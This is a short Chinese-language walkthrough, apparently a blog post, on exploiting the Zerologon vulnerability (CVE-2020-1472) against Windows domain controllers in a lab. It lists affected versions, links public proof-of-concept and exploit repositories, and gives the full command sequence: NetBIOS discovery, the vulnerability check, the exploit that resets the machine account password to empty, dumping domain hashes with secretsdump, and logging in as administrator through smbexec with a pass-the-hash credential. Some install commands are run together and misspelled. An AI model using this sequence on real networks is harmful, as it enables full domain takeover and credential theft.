Netlogon域控提权(CVE-2020-1472)
Netlogon域控提权(CVE-2020-1472)
影响版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
环境描述:
域控: Windows Server 2008 R2 Standard
攻击机:kali-linux-2020.1 (不在域内,能连通域控)
POC地址:
https://github.com/SecuraBV/CVE-2020-1472
查询netbios名称:
linux:
nbtscan -v -h 192.168.1.1
Workstation Service选项的值
windows:
nbtstat -A 192.168.1.1
检测漏洞:
python3 zerologon_tester.py dc-netbios-name dc-ip
漏洞利用:
exp地址:
https://github.com/dirkjanm/CVE-2020-1472
python3 cve-2020-1472-exploit.py
坑点报错:
Unexpected error:module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'.
解决:需要卸载现有impacket套件,安装最新的impacket
卸载:
sudo apt remove --purge impacket-scripts python3-impacketsudo apt autoremove
安装:
git clone https://github.com/SecureAuthCorp/impacketcd impacketsudo pip isntall .sudo python3 setup.py install
密码置空,使用secretdump获取域控上的hash(这里置空的是域控所在机器的机器管理员密码,而非域控密码--->域控所在机器密码跟更改可能会影响与其他域的通信或者域控上的dns等功能)
python3 ./secretsdump.py 域名称/域控机器名称\$@域控IP -just-dc -no-pass
登陆域控制器:
python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d04d7b62dc03efd51b0b8f296ab875da administrator@192.168.1.1
浙公网安备 33010602011771号